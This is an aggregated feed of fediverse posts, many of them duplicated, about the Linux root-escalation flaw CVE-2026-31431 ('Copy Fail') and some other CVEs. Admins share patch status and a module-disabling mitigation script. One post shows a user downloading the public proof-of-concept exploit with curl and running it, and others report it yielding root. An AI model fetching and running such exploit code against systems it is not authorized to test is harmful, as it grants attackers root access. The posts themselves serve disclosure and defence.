agresor at 2026-04-30T10:35:46.112Z ##

Copy Fail (CVE-2026-31431): 732 bytes to take control of the system ( nfsec.pl/security/6718 )

youtube.com/watch?v=-RuJTJga2fU

##

Atirut@toot.community at 2026-04-30T10:26:18.000Z ##

PSA for sysadmins: master.almalinux-org.pages.dev

TL;DR anyone with an unprivileged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.

#sysadmin #Linux #psa #cve

##

egghat@mastodon.social at 2026-04-30T10:06:30.000Z ##

Oops.

„If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.“

Copy Fail — CVE-2026-31431 copy.fail/
#BadNews

##

cyberveille@mastobot.ping.moi at 2026-04-30T10:00:24.000Z ##

📢 CVE-2026-31431 'Copy Fail': root privilege escalation in 732 bytes on all major Linux distributions
📝 ## 🔍 Context

Published on 29 April 2026 on the Xint blog (xint.io), this article is a...
📖 cyberveille : cyberveille.ch/posts/2026-04-3
🌐 source : xint.io/blog/copy-fail-linux-d
#AF_ALG #CVE_2016_5195 #Cyberveille

##

decio at 2026-04-30T09:59:10.859Z ##

[VULN] ⚠️"Copy Fail - An AI finds the Linux flaw nobody saw"
" * Copy Fail (CVE-2026-31431) is a Linux flaw that lets a plain user become root in 732 bytes, affecting nearly all unpatched kernels since 2017, discovered by an AI in one hour.

  • The flaw exploits a 2017 optimisation in the crypto subsystem that leaves a read-only file reachable through a writable area, allowing a system binary to be modified step by step via the splice() call.
  • Two protections exist: patch the kernel through the distro, or disable the algif_aead module (or block the crypto subsystem via seccomp if the module is built in)."👇 korben.info/copy-fail-faille-k

Demo / exploit ( via @bortzmeyer )
👇
bortzmeyer.org/copyfail.html

🔍
⬇️
vulnerability.circl.lu/vuln/CV

💬
⬇️
infosec.pub/post/45735124

##

pbloem@sigmoid.social at 2026-04-30T09:55:18.000Z ##

So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.

bugcrowd.com/blog/what-we-know

I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.

##

rabbithawk256@wetdry.world at 2026-04-30T09:03:35.000Z ##

so what do I even do at this point. the patch for CVE-2026-31431 isn't out yet on debian stable and the only fixes I see are to recompile the kernel which I have zero idea how to do

##

mastokukei@social.josko.org at 2026-04-30T09:02:02.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- **AI coding tools and controversies**: Discussions on Claude Code deleting databases, GitHub Copilot’s usage-based billing, and AI-generated code ownership debates.
- **GitHub reliability and alternatives**: Criticism of GitHub’s frequent outages, security vulnerabilities (e.g., CVE-2026-31431, CVE-2026-3854), and migrations to alternatives like [1/3]

##

mastokukei@social.josko.org at 2026-04-30T09:01:49.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #technologyAtKukei masto.kukei.eu/browse/technolo category:
- **AI and LLM Developments & Controversies**: Discussions on AI solving mathematical problems (Erdős problem), AI-generated content issues (goblins in OpenAI Codex), AI agents causing data loss (Claude deleting databases), and AI ethics concerns (biological weapons, copyright infringement).
- **Linux Security Vulnerability (CVE-2026-31431)**: A [1/3]

##

stuartl@longlandclan.id.au at 2026-04-30T09:00:48.000Z ##

@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.

bugs.gentoo.org/show_bug.cgi?i

Looks like @thesamesam is well and truly onto it.

Also for #Debian users, at the moment they're working on fixes: security-tracker.debian.org/tr

Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.

##

yumetodo@misskey.dev at 2026-04-30T08:36:52.110Z ##

Hmm? Is this bad?
"I tried demonstrating the Linux kernel vulnerability CopyFail (CVE-2026-31431) on Ubuntu 22.04 on EC2"
https://zenn.dev/aeyesec/articles/7e4a1e3c83e81b

##

SpaceLifeForm at 2026-04-30T07:32:55.031Z ##

I can confirm this report where Copyfail fails.

github.com/theori-io/copy-fail

##

tisba@ruby.social at 2026-04-30T07:20:51.000Z ##

Copy Fail (copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.

It would be great to get some momentum to code.forgejo.org/forgejo/forge (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.

#security

##

isAutonomous@karlsruhe-social.de at 2026-04-30T07:08:34.000Z ##

@giggls Damn, yes. This is the right ID:
euvd.enisa.europa.eu/vulnerabi

The Europeans' designations are confusing. Why do they have to assign their own numbers?
"EUVD-2026-24639"

##

bws@social.linux.pizza at 2026-04-30T06:54:59.000Z ##

@fooflington I'm on it right now.
security-tracker.debian.org/tr
Just dumping a PoC (unverified) without responsible disclosure, for maximum fame, to promote your own AI scanner.

##

chrispy@chaos.social at 2026-04-30T06:48:18.000Z ##

@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST

##

ligasser@social.epfl.ch at 2026-04-30T06:44:01.000Z ##

#linux #kernel #exploit - I completely missed this one:

bugcrowd.com/blog/what-we-know

Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...

Gotta sign up on some more security accounts here!

##

rimu@piefed.social at 2026-04-30T06:37:44.933Z ##

A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26

##

undercodenews@mastodon.social at 2026-04-30T05:43:19.000Z ##

Linux Kernel “Copy Fail” Zero-Day Exposes Millions of Systems to Instant Root Access

Introduction A newly disclosed Linux kernel vulnerability is raising serious alarms across the cybersecurity world. Tracked as CVE-2026-31431 and nicknamed Copy Fail, the flaw allows any unprivileged local user to gain full root access on many Linux systems released since 2017. Security researchers say the exploit is unusually simple, reliable, and dangerous, requiring only a short…

undercodenews.com/linux-kernel

##

cr0nym@mastodon.social at 2026-04-30T05:20:24.000Z ##

CVE-2026-31431 #copyfail Tetragon Tracing Policy - Kill unprivileged aead_recvmsg. This is the low-level customization of configuration policies your #Linux EDR should have. Also, watch out for processes running NULL argv gist.github.com/cr0nx/3079c573

##

appinn@pullopen.xyz at 2026-04-30T04:17:04.000Z ##

"Copy Fail: a vulnerability present since 2017, one script gets Linux root privileges | CVE-2026-31431"
Only 10 lines of code are needed to get root on most Linux distributions released from 2017 to today. Known as Copy Fail, vulnerability ID CVE-2026-31431. First watch the privilege-escalation demo video. Demo code. The code comes
……
Read the full article: :sys_link: appinn.com/copy-fail-cve-2026-

#小众软件

##

tankgrrl@hachyderm.io at 2026-04-30T02:46:20.000Z ##

Joker voice: Just wait 'til malicious agents and overly aggressive users get a load of CVE-2026-31431

##

tankgrrl@hachyderm.io at 2026-04-30T02:40:15.000Z ##

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

##

thesamesam@treehouse.systems at 2026-04-30T01:06:03.000Z ##

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

##

newsyc500@toot.community at 2026-04-30T00:43:14.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hn500@social.lansky.name at 2026-04-30T00:35:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

adamw@fosstodon.org at 2026-04-29T23:39:24.000Z ##

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py raw.githubusercontent.com/theo
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

obivan at 2026-04-29T22:43:47.841Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 copy.fail/

##

roens@hachyderm.io at 2026-04-29T22:32:13.000Z ##

This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.

copy.fail/

##

marshray at 2026-04-29T22:21:07.283Z ##

This is what I'm pasting into my own linux systems to implement the mitigation suggested at the website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb at 2026-04-29T22:15:16.659Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB secdb.nttzen.cloud/cve/detail/


##

ajuvo@chaos.social at 2026-04-29T22:01:27.000Z ##

security-tracker.debian.org/tr

##

cR0w at 2026-04-29T21:55:48.287Z ##

@krypt3ia @Viss github.com/theori-io/copy-fail

##

sambowne at 2026-04-29T21:46:01.476Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation copy.fail/

##

newsyc300@toot.community at 2026-04-29T21:43:29.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hackernewsrobot@mastodon.social at 2026-04-29T21:37:14.000Z ##

Copy Fail – CVE-2026-31431 copy.fail/

##

geheimorga@chaos.social at 2026-04-29T21:23:23.000Z ##

We'll check your Linux distro! Come by the next #DiDay with your well-aged 5.x kernels and we'll hold hands while we run exploit.py from CVE-2026-31431 together.

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:19:51.000Z ##

security-tracker.debian.org/tr

##

zaphodb@twitter.resolvt.net at 2026-04-29T21:11:07.000Z ##

github.com/theori-io/copy-fail

##

newsyc250@toot.community at 2026-04-29T21:03:31.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

hn250@social.lansky.name at 2026-04-29T21:00:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

interpipes@thx.gg at 2026-04-29T20:44:26.000Z ##

Hello

I am here to ruin your day again

copy.fail/ / CVE-2026-31431

Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.

#infosec #linux #vulnerability

##

Emily at 2026-04-29T20:32:32.891Z ##

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

access.redhat.com/security/cve

##

Emily at 2026-04-29T20:31:18.159Z ##

RE: hachyderm.io/@petrillic/116489

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: access.redhat.com/security/cve

##

newsyc200@toot.community at 2026-04-29T20:23:26.000Z ##

Copy Fail – CVE-2026-31431: copy.fail/

Discussion: news.ycombinator.com/item?id=4

##

DerMolly@kif.rocks at 2026-04-29T20:22:15.000Z ##

I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.

You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.

copy.fail

security-tracker.debian.org/tr

ubuntu.com/security/CVE-2026-3

suse.com/security/cve/CVE-2026

#copyfail

##

jcrabapple@dmv.community at 2026-04-30T11:50:41.000Z ##

Copy Fail — CVE-2026-31431

copy.fail/

##

CuratedHackerNews@mastodon.social at 2026-04-30T11:39:04.000Z ##

Copy-fail-destroyer: K8s remediation for CVE-2026-31431

github.com/NorskHelsenett/copy

#github #k8s

##

Natanox@chaos.social at 2026-04-30T11:16:58.000Z ##

@yuka Debian is uncomfortably slow pushing the fix.
security-tracker.debian.org/tr

##

harld@masto.ai at 2026-04-30T11:04:20.000Z ##

Still, it's always impressive what hackers manage to find.

'Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.'

"Copy Fail — CVE-2026-31431"

copy.fail/

##

beyondmachines1@infosec.exchange at 2026-04-30T11:01:29.000Z ##

Copy Fail: Linux Kernel Flaw Grants Root Access On All Major Distributions

A Linux kernel vulnerability called "Copy Fail" (CVE-2026-31431) allows unprivileged local users to gain root privileges with 100% reliability by corrupting the shared page cache. The flaw affects nearly all Linux distributions since 2017 and enables container escapes because the memory corruption does not modify files on disk.

**If you run Linux servers, especially shared environments like Kubernetes clusters, CI/CD runners, or multi-tenant hosts, patch your kernel immediately to a version that includes the fix (mainline commit a664bf3d603d) for CVE-2026-31431. If you can't patch right away, disable the vulnerable module by running echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf followed by rmmod algif_aead, and for untrusted code environments block AF_ALG socket creation via seccomp as a long-term safeguard.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

agresor@infosec.exchange at 2026-04-30T10:35:46.000Z ##

Copy Fail (CVE-2026-31431): 732 bytes to take control of the system ( nfsec.pl/security/6718 ) #linux #kernel #exploit

youtube.com/watch?v=-RuJTJga2fU

##

Atirut@toot.community at 2026-04-30T10:26:18.000Z ##

PSA for sysadmins: master.almalinux-org.pages.dev

TL;DR anyone with an unprivileged shell can become root with a small exploit. One mean fucker, so be sure to update ASAP once available if you're within blast radius.

#sysadmin #Linux #psa #cve

##

egghat@mastodon.social at 2026-04-30T10:06:30.000Z ##

Oops.

„If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you're in scope.“

Copy Fail — CVE-2026-31431 copy.fail/
#BadNews

##

decio@infosec.exchange at 2026-04-30T09:59:10.000Z ##

[VULN] ⚠️"Copy Fail - An AI finds the Linux flaw nobody saw"
" * Copy Fail (CVE-2026-31431) is a Linux flaw that lets a plain user become root in 732 bytes, affecting almost every unpatched kernel since 2017, discovered by an AI in one hour.

  • The flaw exploits a 2017 optimisation in the crypto subsystem that leaves a read-only file accessible in a writable area, allowing a system binary to be modified progressively via the splice() call.
  • Two protections exist: patch the kernel through the distro, or disable the algif_aead module (or block the crypto subsystem via seccomp if the module is built in)."👇 korben.info/copy-fail-faille-k

Demo / exploit ( via @bortzmeyer )
👇
bortzmeyer.org/copyfail.html

🔍
⬇️
vulnerability.circl.lu/vuln/CV

💬
⬇️
infosec.pub/post/45735124

#CyberVeille #CVE_2026_31431

##

pbloem@sigmoid.social at 2026-04-30T09:55:18.000Z ##

So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.

bugcrowd.com/blog/what-we-know

I'm no security researcher, but this kind of contradicts all those people who said that the OpenBSD bug that Mythos found (for $20K of compute) was just fancy fuzzing, and the only reason it was there was that nobody was investing 20K in OpenBSD security and the security threat of modern AI was all hype.

##

linux@activitypub.awakari.com at 2026-04-30T08:21:56.000Z ## A critical vulnerability has been discovered in many Linux distributions: 732 bytes of code give root privileges to anyone. The developers...

#IT #Новини #Copy #Fail #CVE-2026-31431 #Linux #Python #root #Xint #Code #киберсигурност

##

stuartl@longlandclan.id.au at 2026-04-30T09:00:48.000Z ##

@chuso Probably worth mentioning the related bug on #Gentoo Bugzilla.

bugs.gentoo.org/show_bug.cgi?i

Looks like @thesamesam is well and truly onto it.

Also for #Debian users, at the moment they're working on fixes: security-tracker.debian.org/tr

Edit: Nothing seen on the #AlpineLinux front, I guess we'll hear from @alpinelinux in due course.

##

SpaceLifeForm@infosec.exchange at 2026-04-30T07:32:55.000Z ##

I can confirm this report where Copyfail fails.

github.com/theori-io/copy-fail

#Debian #Copyfail

##

tisba@ruby.social at 2026-04-30T07:20:51.000Z ##

Copy Fail (copy.fail/, CVE-2026-31431) is a good reminder why I don’t want to run CI jobs only in containers.

It would be great to get some momentum to code.forgejo.org/forgejo/forge (microVMs for forgejo actions). At least on bare metal (or nested VMs with nested KVM) this would make things a lot safer. It would also simplify the usage of containers/docker in CI jobs without compromising security, which is kind of a pain with Codeberg Action currently.

#security

##

isAutonomous@karlsruhe-social.de at 2026-04-30T07:08:34.000Z ##

@giggls Damn, yes. That is the correct ID:
euvd.enisa.europa.eu/vulnerabi

The European designations are confusing. Why do they have to assign their own numbers?
"EUVD-2026-24639"

##

bws@social.linux.pizza at 2026-04-30T06:54:59.000Z ##

@fooflington I'm on it right now.
security-tracker.debian.org/tr
Just throwing out a PoC (unverified) without responsible disclosure, for maximum fame, to promote their own AI scanner.

##

chrispy@chaos.social at 2026-04-30T06:48:18.000Z ##

@fanf42 → lets an unprivileged local user write into the page cache and obtain root
CVE-2026-31431, no score yet at NIST

##

ligasser@social.epfl.ch at 2026-04-30T06:44:01.000Z ##

#linux #kernel #exploit - I completely missed this one:

bugcrowd.com/blog/what-we-know

Privilege escalation on all linux kernels since 2017. And I cannot even see if my current ubuntu kernel has a patch for it...

Gotta sign up on some more security accounts here!

##

rimu@piefed.social at 2026-04-30T06:37:44.933Z ##

A mitigation that worked for me - https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/26

##

tankgrrl@hachyderm.io at 2026-04-30T02:46:20.000Z ##

Joker voice: Just wait 'til malicious agents and overly aggressive users get a load of CVE-2026-31431

##

tankgrrl@hachyderm.io at 2026-04-30T02:40:15.000Z ##

So... came home to a proverbial tire fire. CVE-2026-31431

Yay. I am bold and DGAF so I made the call to shut off all login access (a call backed up by my peers shortly after).

Users who don't check their mail, look at status, or check our websites will be sending in 'URGENT' tickets any minute now.

##

poundquerydotinfo@virctuary.com at 2026-04-30T02:34:47.000Z ##

CopyFail results:

On Debian 12 (6.1.158 kernel) PoC didn't seem to work, I got prompted for a password.

On Debian 14 (6.18.5 kernel) got dropped right into a root prompt.

So this is very real. Yikes.

Proof of concept: github.com/theori-io/copy-fail

Write up: discourse.ifin.network/t/copy-

##

thesamesam@treehouse.systems at 2026-04-30T01:06:03.000Z ##

Very unfortunate that the fix for CVE-2026-31431 isn't easily backportable, with a new API being added, and then its implementation details changing, since the last LTS (6.12 vs 6.18).

##

hn500@social.lansky.name at 2026-04-30T00:35:11.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

linux@activitypub.awakari.com at 2026-04-29T20:24:43.000Z ## Copy Fail (CVE-2026-31431) is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms. ht...

#r/sysadmin

##

adamw@fosstodon.org at 2026-04-29T23:39:24.000Z ##

@marshray doesn't work on vaguely recent F44 kernel for me.

[adamw@omnibook ~]$ curl -o /tmp/test.py raw.githubusercontent.com/theo
[adamw@omnibook ~]$ python3 /tmp/test.py
Password:
su: Authentication failure
[adamw@omnibook ~]$ uname -r
6.19.13-300.fc44.x86_64

##

yukotan.bsky.social@bsky.brid.gy at 2026-04-29T23:25:16.858Z ##

Apparently a zero-day vulnerability affecting every distro has been found. Privilege escalation is possible. Copy Fail — CVE-2026-31431 copy.fail

Copy Fail — 732 Bytes to Root

##

hnbest@mastodon.social at 2026-04-29T23:00:01.000Z ##

Copy Fail – CVE-2026-31431
copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

obivan@infosec.exchange at 2026-04-29T22:43:47.000Z ##

CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 copy.fail/

##

marshray@infosec.exchange at 2026-04-29T22:21:07.000Z ##

This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.

f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f

##

secdb@infosec.exchange at 2026-04-29T22:15:16.000Z ##

🚨 CVE-2026-31431 (Copy Fail)

In the Linux kernel, the following vulnerability has been resolved:

crypto: algif_aead - Revert to operating out-of-place

This mostly reverts commit 72548b093ee3 except for the copying of the associated data.

There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.

ℹ️ Additional info on ZEN SecDB secdb.nttzen.cloud/cve/detail/

#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel

##

cR0w@infosec.exchange at 2026-04-29T21:55:48.000Z ##

@krypt3ia @Viss github.com/theori-io/copy-fail

##

sambowne@infosec.exchange at 2026-04-29T21:46:01.000Z ##

Copy Fail — CVE-2026-31431 Linux Privilege Escalation copy.fail/

##

Emily@infosec.exchange at 2026-04-29T20:32:32.000Z ##

@mttaggart

Editing to add:

RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

Looks like it requires a local user account, with a password set, to exploit, yes?

access.redhat.com/security/cve

##

Emily@infosec.exchange at 2026-04-29T20:31:18.000Z ##

RE: hachyderm.io/@petrillic/116489

I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: access.redhat.com/security/cve

##

jschauma@mstdn.social at 2026-04-29T19:42:35.000Z ##

Ooooh, nice:

xint.io/blog/copy-fail-linux-d

CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.

#CopyFail

##

hackersnews@mastodon.cesium.pw at 2026-04-29T19:30:26.000Z ##

Copy Fail – CVE-2026-31431
news.ycombinator.com/item?id=4

#hackernews #tech

##

giggls@karlsruhe-social.de at 2026-04-29T19:17:23.000Z ##

Hm security-tracker.debian.org/tr

##

hn100@social.lansky.name at 2026-04-29T19:05:10.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-29T19:00:11.000Z ##

Copy Fail – CVE-2026-31431
Link: copy.fail/
Comments: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-29T18:45:06.000Z ##

Copy Fail – CVE-2026-31431

Link: copy.fail/
Discussion: news.ycombinator.com/item?id=4

##

h4ckernews@mastodon.social at 2026-04-29T18:24:09.000Z ##

Copy Fail – CVE-2026-31431

copy.fail/

#HackerNews #CopyFail #CVE2026 #Security #Vulnerability #HackerNews #TechNews

##

CVE-2026-39457(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:32

2 posts

When exchanging data over a socket, libnv uses select(2) to wait for data to arrive. However, it does not verify whether the provided socket descriptor fits in select(2)'s file descriptor set size limit of FD_SETSIZE (1024). An attacker who is able to force a libnv application to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to cl

CVE-2026-7270(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:32

2 posts

An operator precedence bug in the kernel results in a scenario where a buffer overflow causes attacker-controlled data to overwrite adjacent execve(2) argument buffers. The bug may be exploitable by an unprivileged user to obtain superuser privileges.

grahamperrin@bsd.cafe at 2026-04-30T04:29:15.000Z ##

RE: mastodon.bsd.cafe/@grahamperri

3/

CVE-2026-7270 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:13.exec <security.freebsd.org/advisorie> credited to Ryan of Calif.io.

Calif is recently known for post-CVE attention to an earlier CVE, <blog.calif.io/p/mad-bugs-claud>. This work by Calif was wrongly attributed to Nicholas Carlini (an error by Devansh in 'Artificial Intelligence Made Simple').

##

CVE-2026-7164(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:32

2 posts

Incorrect packet validation allowed unbounded recursion parsing SCTP chunk parameters. This can eventually result in a stack overflow and panic. Remote attackers can craft packets which cause affected systems to panic. This affects any system where pf is configured to process traffic, independent of the configured ruleset.

grahamperrin@bsd.cafe at 2026-04-30T04:20:15.000Z ##

2/

CVE-2026-7164 <cve.org/CVERecord?id=CVE-2026-> FreeBSD-SA-26:14.pf <security.freebsd.org/advisorie> credited to Igor Gabriel Sousa e Souza.

I can't easily find any information about this person.

##

CVE-2026-5402
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T09:30:31

2 posts

TLS protocol dissector heap overflow in Wireshark 4.6.0 to 4.6.4 allows denial of service and possible code execution

offseq at 2026-04-30T07:30:28.032Z ##

⚠️ CVE-2026-5402: HIGH severity heap buffer overflow in Wireshark 4.6.0 – 4.6.4 TLS dissector. Exploitation can lead to DoS or code execution. No patch yet — avoid untrusted TLS traffic. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T07:30:28.000Z ##

⚠️ CVE-2026-5402: HIGH severity heap buffer overflow in Wireshark 4.6.0 – 4.6.4 TLS dissector. Exploitation can lead to DoS or code execution. No patch yet — avoid untrusted TLS traffic. radar.offseq.com/threat/cve-20 #OffSeq #Wireshark #CVE20265402 #BlueTeam

##

CVE-2026-42511(CVSS UNKNOWN)

EPSS: 0.00%

updated 2026-04-30T09:30:31

2 posts

The BOOTP file field is written to the lease file without escaping embedded double-quotes, allowing injection of arbitrary dhclient.conf directives. When the lease file is subsequently re-parsed by dhclient, e.g., after a system restart, an attacker-controlled field from the lease is passed to dhclient-script(8), which evaluates it. A rogue DHCP server may be able to execute arbitrary code as roo

CVE-2026-42512
(0 None)

EPSS: 0.00%

updated 2026-04-30T09:16:03.373000

2 posts

As dhclient is building an environment to pass to dhclient-script, it may need to resize the array of string pointers. The code which expands the array incorrectly calculates its new size when requesting memory, resulting in a heap buffer overrun. A specially crafted packet can cause dhclient to overrun its buffer of environment entries. This can result in a crash, but it may be possible to lev

CVE-2026-35547
(0 None)

EPSS: 0.00%

updated 2026-04-30T09:16:03.167000

2 posts

When processing the header of an incoming message, libnv failed to properly validate the message size. The lack of validation allows a malicious program to write outside the bounds of a heap allocation. This can trigger a crash or system panic, and it may be possible for an unprivileged user to exploit the bug to elevate their privileges.

CVE-2026-5201
(7.5 HIGH)

EPSS: 0.09%

updated 2026-04-30T08:16:07.410000

1 post

A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of servi

1 repo

https://github.com/kagancapar/CVE-2026-5201

linux@activitypub.awakari.com at 2026-04-28T03:12:25.000Z ## Oracle Linux 9 gdk-pixbuf2 Important Fix ELSA-2026-10708 CVE-2026-5201 The following updated rpms for Oracle Linux 9 have been uploaded to the Unbreakable Linux Network:

#Oracle #Linux #Distribution #- #Security #Advisories

##

CVE-2026-7470
(8.8 HIGH)

EPSS: 0.00%

updated 2026-04-30T03:16:01.740000

2 posts

A flaw has been found in Tenda 4G300 US_4G300V1.0Mt_V1.01.42_CN_TDC01. Affected is the function sub_427C3C of the file /goform/SafeMacFilter. This manipulation of the argument page causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used.

offseq at 2026-04-30T06:00:27.641Z ##

⚠️ CVE-2026-7470: HIGH severity stack buffer overflow in Tenda 4G300 (US_4G300V1.0Mt_V1.01.42_CN_TDC01). Exploit public, no patch yet. Restrict access & monitor for activity. radar.offseq.com/threat/cve-20

##

offseq@infosec.exchange at 2026-04-30T06:00:27.000Z ##

⚠️ CVE-2026-7470: HIGH severity stack buffer overflow in Tenda 4G300 (US_4G300V1.0Mt_V1.01.42_CN_TDC01). Exploit public, no patch yet. Restrict access & monitor for activity. radar.offseq.com/threat/cve-20 #OffSeq #Vulnerability #Tenda #RouterSecurity

##

barubary at 2026-04-30T10:22:34.106Z ##

RE: social.bund.de/@certbund/11649

labs.watchtowr.com/the-interne

##

jorijn@toot.community at 2026-04-30T05:43:39.000Z ##

An authentication bypass security issue has been identified in the cPanel software (including DNSOnly) affecting all versions after 11.40.

This one is ugly, folks. Go update your servers now, and run the detection script.

support.cpanel.net/hc/en-us/ar

#Webhosting #cPanel #WHM

##

offseq at 2026-04-30T01:30:29.611Z ##

🚨 CRITICAL auth bypass in cPanel & WHM (CVE-2026-41940, CVSS 9.3) lets unauthenticated attackers access the control panel. Patch not confirmed — restrict interface to trusted IPs & monitor advisories. radar.offseq.com/threat/cve-20

##

campuscodi@mastodon.social at 2026-04-30T00:20:04.000Z ##

Major authentication bypass disclosed in cPanel

support.cpanel.net/hc/en-us/ar

##

thehackerwire@mastodon.social at 2026-04-29T23:42:10.000Z ##

🔴 CVE-2026-41940 - Critical (9.8)

